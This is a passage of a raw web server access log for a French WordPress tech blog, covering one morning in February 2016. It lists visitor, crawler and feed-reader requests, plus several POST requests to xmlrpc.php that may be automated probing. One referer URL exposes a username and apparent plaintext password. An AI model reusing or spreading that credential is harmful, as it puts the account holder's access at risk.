/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/?cf_action=sync_comments&post_id=307 HTTP/1.1\" 200 309 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.103 Safari/537.36\"\n62.210.142.23 - jez [08/Feb/2016:09:06:07 -0800] \"GET /rss HTTP/1.1\" 304 163 \"http://jez:lumn0h3D@techmeup.co/rss\" \"FreshRSS/1.0.0 (Linux; http://freshrss.org) SimplePie/1.4-dev-FreshRSS\"\n198.58.96.215 - - [08/Feb/2016:09:09:28 -0800] \"GET /rss HTTP/1.1\" 304 219 \"-\" \"Superfeedr bot/2.0 http://superfeedr.com - Make your feeds realtime: get in touch - feed-id:138292308\"\n195.68.195.30 - - [08/Feb/2016:09:10:28 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:09:10:28 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:09:10:28 -0800] \"GET /wp-content/plugins/wp-shortcode/js/jquery.tipsy.js?ver=4.1.1 HTTP/1.1\" 200 3065 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:09:10:28 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:09:10:28 -0800] \"GET /wp-content/uploads/2014/07/tumblr_inline_n81d6jwEIM1sygmpd-50x50.jpg HTTP/1.1\" 200 2055 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:09:10:28 -0800] \"GET /wp-content/themes/great/images/search.png HTTP/1.1\" 200 1683 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n195.68.195.30 - - [08/Feb/2016:09:10:34 -0800] \"GET /wp-content/uploads/2014/07/tumblr_inline_n8zzsrRyDF1sa6hof-50x50.jpg HTTP/1.1\" 200 2181 \"http://techmeup.co/raodath-aminou-la-revolution-du-commerce-est-en/\" \"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n66.249.64.132 - - [08/Feb/2016:09:11:59 -0800] \"GET /liam-boogar-co-fondateur-et-ceo-rude-baguette HTTP/1.1\" 301 442 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n66.249.64.250 - - [08/Feb/2016:09:18:09 -0800] \"GET /liam-boogar-co-fondateur-et-ceo-rude-baguette/ HTTP/1.1\" 200 10346 \"-\" \"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\"\n213.136.71.211 - - [08/Feb/2016:09:21:50 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n177.185.194.131 - - [08/Feb/2016:09:32:49 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 793 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n196.217.79.189 - - [08/Feb/2016:09:34:18 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n196.217.79.189 - - [08/Feb/2016:09:34:18 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n62.210.250.66 - - [08/Feb/2016:09:36:12 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n173.236.224.133 - - [08/Feb/2016:09:43:35 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 481 \"-\" \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:23.0) Gecko/20100101 Firefox/23.0\"\n157.55.39.143 - - [08/Feb/2016:09:47:36 -0800] \"GET / HTTP/1.1\" 200 7274 \"-\" \"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\"\n199.16.156.124 - - [08/Feb/2016:09:48:18 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la-silicon HTTP/1.1\" 404 4816 \"-\" \"Twitterbot/1.0\"\n196.217.79.189 - - [08/Feb/2016:09:50:49 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 115506 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n196.217.79.189 - - [08/Feb/2016:09:50:49 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.218.120.177 - - [08/Feb/2016:09:52:40 -0800] \"GET /wp-content/themes/great/js/customscript.js HTTP/1.1\" 200 3600 \"http://techmeup.co/a-quoi-ca-sert-un-co-fondateur-non-technique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.218.120.177 - - [08/Feb/2016:09:52:40 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/a-quoi-ca-sert-un-co-fondateur-non-technique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.218.120.177 - - [08/Feb/2016:09:52:40 -0800] \"GET /wp-includes/js/comment-reply.min.js?ver=4.1.1 HTTP/1.1\" 200 757 \"http://techmeup.co/a-quoi-ca-sert-un-co-fondateur-non-technique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.218.120.177 - - [08/Feb/2016:09:52:40 -0800] \"GET /wp-content/plugins/disqus-comment-system/media/js/disqus.js?ver=4.1.1 HTTP/1.1\" 200 1101 \"http://techmeup.co/a-quoi-ca-sert-un-co-fondateur-non-technique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.218.120.177 - - [08/Feb/2016:09:52:40 -0800] \"GET /wp-content/uploads/2014/12/tumblr_inline_nfw3g9NCQc1r792z4-50x50.jpg HTTP/1.1\" 200 2817 \"http://techmeup.co/a-quoi-ca-sert-un-co-fondateur-non-technique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.218.120.177 - - [08/Feb/2016:09:52:41 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/wp-content/themes/great/style.css\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0\"\n85.218.120.177 - - [08/Feb/2016:09:52:43 -0800] \"GET /a-quoi-ca-sert-un-co-fondateur-non-technique/?cf_action=sync_comments&post_id=27 HTTP/1.1\" 200 308 \"http://techmeup.co/a-quoi-ca-sert-un-co-fondateur-non-technique/\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:43.0) Gecko/20100101 Firefox/43.0\"\n92.139.71.249 - - [08/Feb/2016:09:55:08 -0800] \"GET /post/98008044383/trouver-un-job-tech-a-san-francisco-ou-dans-la HTTP/1.1\" 301 366 \"-\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_3) AppleWebKit/601.4.4 (KHTML, like Gecko)\"\n92.139.71.249 - - [08/Feb/2016:09:55:11 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n92.139.71.249 - - [08/Feb/2016:09:55:23 -0800] \"GET /trouver-un-job-tech-a-san-francisco-ou-dans-la HTTP/1.1\" 301 442 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n92.139.71.249 - - [08/Feb/2016:09:55:29 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n195.154.172.143 - - [08/Feb/2016:09:55:30 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:30 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:30 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:30 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/sylvia-gallusser-expatriee-aux-us-jaime-mon-pays-la-france-reviensleon/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:09:55:32 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:09:55:32 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2049 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:09:55:32 -0800] \"GET /wp-content/uploads/2015/03/Photo-Bio-2013-300x300.jpg HTTP/1.1\" 200 24078 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:09:55:32 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/ce-que-je-referais-autrement-invite-cedric-giorgi/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:09:55:35 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 867 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:09:55:35 -0800] \"GET /wordpress/wp-content/uploads/2015/02/logo-text1.png HTTP/1.1\" 200 5144 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:09:55:35 -0800] \"GET /wp-content/uploads/2014/12/tumblr_inline_nfq2o82z0r1sa6hof-50x50.jpg HTTP/1.1\" 200 2106 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.137 - - [08/Feb/2016:09:55:35 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/le-talent-cache-de-ludovic-copere-electron-libre-de-linnovation-a-sony-du-japon-au-tango/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:36 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:36 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:36 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:36 -0800] \"GET /wp-content/themes/great/images/arrow.png HTTP/1.1\" 200 437 \"http://techmeup.co/ce-que-je-referais-autrement-invitee-mathilde-le-rouzic/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:09:55:37 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:09:55:37 -0800] \"GET /wp-content/uploads/2014/11/tumblr_inline_neyg93Sin01sa6hof-50x50.jpg HTTP/1.1\" 200 2005 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.179.93 - - [08/Feb/2016:09:55:37 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/teresa-colombi-ou-le-futur-de-lexperience-utilisateur/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:39 -0800] \"GET /le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/ HTTP/1.1\" 200 9667 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:40 -0800] \"GET /wp-content/plugins/wp-shortcode/css/wp-shortcode.css?ver=4.1.1 HTTP/1.1\" 200 2050 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:40 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 97500 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:40 -0800] \"GET /wp-content/themes/great/images/twitter.png HTTP/1.1\" 200 4482 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:40 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/le-talent-cache-de-jerome-petazzoni-tinkerer-extraordinaire-chez-docker-de-lart-du-code-a-la-musique/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:09:55:41 -0800] \"GET /wp-content/plugins/easy-twitter-feed-widget/easy-twitter-feed-widget.css?ver=4.1.1 HTTP/1.1\" 200 505 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:09:55:41 -0800] \"GET /wp-content/uploads/2015/02/tumblr_inline_nixmj1dBlt1sygmpd-50x50.jpg HTTP/1.1\" 200 2351 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.217.154 - - [08/Feb/2016:09:55:41 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/du-travail-pour-les-epoux-epouses-dimmigres-tech-aux-us/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:43 -0800] \"GET /le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/ HTTP/1.1\" 200 9062 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:43 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:43 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37377 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:43 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4390 \"http://techmeup.co/le-talent-cache-dadrien-friggeri-data-scientist-chez-facebook-savoir-passer-du-code-a-la-maille/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:44 -0800] \"GET /suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/ HTTP/1.1\" 200 7034 \"-\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:45 -0800] \"GET /wp-content/themes/great/style.css HTTP/1.1\" 200 7662 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:45 -0800] \"GET /wp-content/uploads/2015/02/photo-7-50x50.jpg HTTP/1.1\" 200 2288 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n62.210.248.185 - - [08/Feb/2016:09:55:45 -0800] \"GET /wp-content/themes/great/images/facebook.png HTTP/1.1\" 200 4285 \"http://techmeup.co/suivez-nous-sur-facebook-twitter-et-maintenant-linkedin/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:46 -0800] \"GET /wp-content/plugins/hupso-share-buttons-for-twitter-facebook-google/style.css?ver=4.1.1 HTTP/1.1\" 200 416 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:46 -0800] \"GET /wp-content/plugins/wp-shortcode/css/tipsy.css?ver=4.1.1 HTTP/1.1\" 200 868 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:46 -0800] \"GET /wp-content/themes/great/images/linkedin.png HTTP/1.1\" 200 4391 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n195.154.172.143 - - [08/Feb/2016:09:55:46 -0800] \"GET /wp-content/uploads/2015/02/Hedge-Funds-and-Social-Media-50x50.jpg HTTP/1.1\" 200 1964 \"http://techmeup.co/adieu-tumblr/\" \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.21 (KHTML, like Gecko) wpif Safari/537.21\"\n41.188.5.237 - - [08/Feb/2016:09:56:37 -0800] \"GET /wp-content/uploads/2015/03/4N8A4857-1024x683.jpg HTTP/1.1\" 200 21900 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36\"\n41.188.5.216 - - [08/Feb/2016:09:57:44 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 206 346 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36\"\n41.188.5.216 - - [08/Feb/2016:09:57:52 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw-1024x524.png HTTP/1.1\" 206 347 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36\"\n41.188.5.216 - - [08/Feb/2016:09:58:00 -0800] \"GET /wp-content/uploads/2015/03/Screenshot-2015-03-13-20.20.39-1024x165.png HTTP/1.1\" 200 33580 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36\"\n196.217.79.189 - - [08/Feb/2016:10:01:55 -0800] \"GET /wp-content/uploads/2015/02/1620528_10152406520622652_278602715_n-300x300.jpg HTTP/1.1\" 200 37378 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n196.217.79.189 - - [08/Feb/2016:10:01:56 -0800] \"GET /wp-content/uploads/2015/03/1-4hdrSSvSgHd6oa4AL5KK3Q.jpeg HTTP/1.1\" 200 174731 \"http://hnwatcher.com/silicon-valley/\" \"Mozilla/5.0 (Windows NT 6.1; rv:43.0) Gecko/20100101 Firefox/43.0\"\n41.188.5.216 - - [08/Feb/2016:09:57:54 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg HTTP/1.1\" 200 51100 \"http://hnwatcher.com/silicon-valley/2015/12/26/recueil-dhistoires-de-talents-francais-de-san-francisco/\" \"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36\"\n89.95.130.140 - - [08/Feb/2016:10:04:42 -0800] \"GET /wp-content/uploads/2015/03/1-l57K-8uyN9ELuGbgcaItmw.png HTTP/1.1\" 200 112061 \"https://www.google.fr/\" \"Mozilla/5.0 (iPad; CPU OS 9_0_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1\"\n46.118.116.135 - - [08/Feb/2016:10:07:47 -0800] \"GET /steeve-morin-de-google-a-lentreprenariat/ HTTP/1.1\" 200 29442 \"http://fealq.com/\" \"Mozilla/5.0 (Windows NT 5.1; U; en) Opera 8.01\"\n62.210.250.66 - - [08/Feb/2016:10:07:42 -0800] \"POST /xmlrpc.php HTTP/1.1\" 200 433 \"http://hnwatcher.com/\" \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36\"\n202.39.169.163 - - [08/Feb/2016:10:10:52 -0800] \"GET /je-viens-chercher-mon-stage-dans-la-silicon-valley/apple-touch-icon.png HTTP/1.1\" 404 4872 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n202.39.169.163 - - [08/Feb/2016:10:11:04 -0800] \"GET /post/104173274688/je-viens-chercher-mon-stage-dans-la-silicon-valley HTTP/1.1\" 301 370 \"-\" \"Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1\"\n202.39.169.163 - - [08/Feb/2016:10:11:08 -0800] \"GET /apple-touch-icon-precomposed.png HTTP/1.1\" 404 4871 \"-\" \"Safari/11601.4.4 CFNetwork/760.2.6 Darwin/15.3.0 (x86_64)\"\n176.154.81.156 - - [08/Feb/2016:10:11:54 -0800] \"GET /wp-content/uploads/2015/03/1-9mRgHn-sBX_FQuA08m4kdA-1024x755.jpeg 